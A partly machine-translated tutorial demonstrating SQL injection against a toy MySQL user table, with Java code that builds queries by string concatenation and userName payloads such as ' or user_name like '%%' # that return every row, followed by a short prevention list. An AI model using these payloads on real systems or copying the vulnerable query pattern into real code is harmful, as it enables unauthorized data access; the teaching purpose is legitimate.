SQL injection (case demonstration)
1. What is SQL injection?
The program is defined in advance
查询语句中添加额外的SQL语句, and the illegal operation can be realized without the administrator's knowledge, so as to realize the欺骗数据库服务器执行非授权的任意查询corresponding data information.
In layman's terms, SQL injection is:
Find flaws through SQL statements and read illegal data.
2. Implementation steps
Description:Use a simple query case to explain SQL injection. The
case uses: Java language and MySQL database
1. Create a new data table
1. Create a new data table and add a few pieces of data
# 新建表
CREATE TABLE `user` (
`user_name` varchar(255),
`password` varchar(255)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
# 向表中添加数据
INSERT INTO `user` VALUES ('zhangsan', '123456');
INSERT INTO `user` VALUES ('1', '2');
INSERT INTO `user` VALUES ('1', '1');
INSERT INTO `user` VALUES ('1', '3');
At this time, the data of the database is as shown in the figure below:
2. SQL injection analysis
1. Define the SQL statement
It can be seen that some SQL statements in the parameters userName and password are passed strings, which means that any content can be passed
String sql = "select * from user where user_name = '"+ userName + "'and password ='" + password + "'";
2. Set the userName and password parameter values
Demonstrate the acquisition of illegal data by passing the value of the parameter userName
The value of userName is divided into four cases, and the value of password is a fixed value in these four cases. 1
| Get data with legal parameters |
|---|
| String userName = “1”; String password = “1”; |
| After passing the parameters, the SQL statement becomes: select * from user where user_name = '1' and password = '1' |
At this time, a piece of data can be read from the database: |
| Illegal parameters to obtain data (1)-other information can be obtained by grasping part of the information |
|---|
| String userName = “1’ or password = '”; String password = “1”; |
| After passing the parameters, the SQL statement becomes: select * from user where user_name = '1' or password = ' ' and password = '1' |
At this time, three pieces of data can be read from the database: |
| Illegal parameters to obtain data (2)-all information can be obtained without anything |
|---|
| String userName = “’ or user_name like ‘%%’ or password = '”; String password = “1”; |
| After passing the parameters, the SQL statement becomes: select * from user whereuser_name = ‘’ or user_name like ‘%%’ or password = ‘ 'and password = '1’ |
Four pieces of data can be read from the database at this time: |
Illegal parameters to obtain data (3) #-use comment out redundant SQL |
|---|
| String userName = "’ or user_name like ‘%%’ # or password = ’ "; String password = “1”; |
| After passing the parameters, the SQL statement becomes: select * from user where user_name = ''or user_name like '%%'# |
| Four pieces of data can be read from the database at this time: |
3. Code case
1. Create a new User entity class
【Description】
If you do not use lombok's @Data annotation, you need to add the set get method and toString method
@Data
public class User {
private String userName;
private String password;
}
2. Create a new Demo class to experience SQL injection
public class Demo {
public static void main(String[] args) throws Exception{
// String userName = "1"; // 正常操作
// String userName = "1' or password = '"; // 掌握丢丢信息就可以获取其它信息
// String userName = "' or user_name like '%%' or password = '"; // 什么都不需要就可拿到所有信息
String userName = "' or user_name like '%%' # or password = ' "; // 升级版
String password = "1";
// 加载数据库驱动
Class.forName("com.mysql.jdbc.Driver");
// 创建数据库连接
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/user表所在的数据库名?" +
"characterEncoding=utf-8&useUnicode=true","root","123456");
// 定义SQL语句
String sql = "select * from user where user_name = '" + userName + "' and password = '" + password + "'";
// 打印出拼接后的SQL语句
System.out.println(sql);
// 创建SQL执行对象
Statement stmt = conn.createStatement();
// 执行SQL语句并返回结果集
ResultSet rs = stmt.executeQuery(sql);
// 遍历出结果集到List集合
List<User> userList = new CopyOnWriteArrayList<>();
while (rs.next()) {
User user = new User();
user.setUserName(rs.getString(1));
user.setPassword(rs.getString(2));
userList.add(user);
}
// 打印结果集
for (User user : userList) {
System.out.println(user);
}
}
}
Third, the way to prevent SQL injection
- SQL precompilation (Java provides PreparedStatement class)
- Check parameters (using regular expressions, etc.)